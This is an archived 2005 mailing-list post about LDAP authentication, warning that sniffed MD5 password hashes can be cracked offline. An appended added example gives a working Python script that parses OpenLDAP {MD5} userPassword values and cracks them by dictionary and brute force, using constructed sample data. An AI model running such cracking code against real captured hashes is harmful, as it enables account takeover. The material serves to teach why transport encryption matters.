[ale] How LDAP works with authentication

Jason Day jasonday at worldnet.att.net
Wed Oct 12 16:23:31 EDT 2005


On Wed, Oct 12, 2005 at 03:22:15PM -0400, Christopher Fowler wrote:
> That is a hell of a lot better than sending the plaintext password to
> LDAP.  I would want the LDAP server to send me an MD5 encrypted
> password.

Sure it's better, but it's still not safe.  If someone is sniffing your
network they can collect the password hashes and then do dictionary
and/or brute force attacks offline.  If someone is using a weak password
it's only marginally better than sending in the clear.  SSL would be
much better, but of course on an embedded device you probably don't have
the option to just install OpenSSL.

I think, and I'm not sure about this, that most LDAP servers do _not_
return the password hash along with the other user data.  I think that
the fact that Domino does do this is considered a security risk.
Assuming this is the case, you will need to add a password hash record
to every user object in order to return it.  Which, of course, will mean
you have to worry about keeping them in sync whenever a user changes
his/her password.

Jason
-- 
Jason Day                                       jasonday at
http://jasonday.home.att.net                    worldnet dot att dot net
 
"Of course I'm paranoid, everyone is trying to kill me."
    -- Weyoun-6, Star Trek: Deep Space 9
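The offline attack Jason describes above, as an added example that is not part of the original post or the thread. It assumes the captured value uses OpenLDAP's "{MD5}" userPassword scheme ("{MD5}" followed by the base64 of the raw MD5 digest); the password, the wordlist and the "captured" attribute value are all constructed here so the script runs offline.

```python
import base64
import hashlib
import itertools
import string
from typing import Iterable, Optional

# Constructed sample data (not real captured traffic).  This is what a sniffer
# would see if an LDAP server returned userPassword in an unencrypted search
# result using the OpenLDAP "{MD5}" scheme: "{MD5}" + base64(md5(password)).
WEAK_PASSWORD = "sunshine"

# Constructed toy wordlist; a real attacker uses lists with millions of entries.
WORDLIST = ["password", "letmein", "qwerty", "sunshine", "dragon", "123456"]


def encode_md5_attr(password: str) -> str:
    """Build a {MD5}-scheme userPassword value, as an LDAP server would store it."""
    digest = hashlib.md5(password.encode("utf-8")).digest()
    return "{MD5}" + base64.b64encode(digest).decode("ascii")


CAPTURED_ATTR = encode_md5_attr(WEAK_PASSWORD)


def parse_md5_attr(value: str) -> bytes:
    """Strip the {MD5} prefix and base64-decode to the raw 16-byte digest."""
    scheme, sep, b64 = value.partition("}")
    if scheme != "{MD5" or not sep or not b64:
        raise ValueError("not a {MD5} userPassword value")
    digest = base64.b64decode(b64)
    if len(digest) != 16:
        raise ValueError("MD5 digest must be 16 bytes")
    return digest


def dictionary_attack(digest: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: hash each candidate and compare to the sniffed digest.

    Nothing touches the LDAP server, so there is no lockout, rate limit or log entry.
    An unsalted MD5 of a weak password falls on the first pass through the list.
    """
    for word in wordlist:
        if hashlib.md5(word.encode("utf-8")).digest() == digest:
            return word
    return None


def brute_force(digest: bytes, alphabet: str = string.digits, max_len: int = 4) -> Optional[str]:
    """Offline brute force over every string up to max_len from the alphabet.

    Short numeric PINs (10^4 candidates) are recovered in milliseconds; the same
    loop scales to any alphabet the attacker has time for.
    """
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if hashlib.md5(candidate.encode("utf-8")).digest() == digest:
                return candidate
    return None


if __name__ == "__main__":
    sniffed = parse_md5_attr(CAPTURED_ATTR)
    print("captured attribute:", CAPTURED_ATTR)
    print("dictionary attack recovered:", dictionary_attack(sniffed, WORDLIST))
    print("PIN brute force recovered:", brute_force(parse_md5_attr(encode_md5_attr("4821"))))
```

The digest recovered from the wire is exactly the value the attacker needs to test guesses against, so shipping a hash instead of the cleartext only slows an attacker down by the cost of one MD5 per guess. The fix Jason points at is to encrypt the transport (LDAPS or StartTLS) so neither the hash nor the password is visible to a sniffer in the first place.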


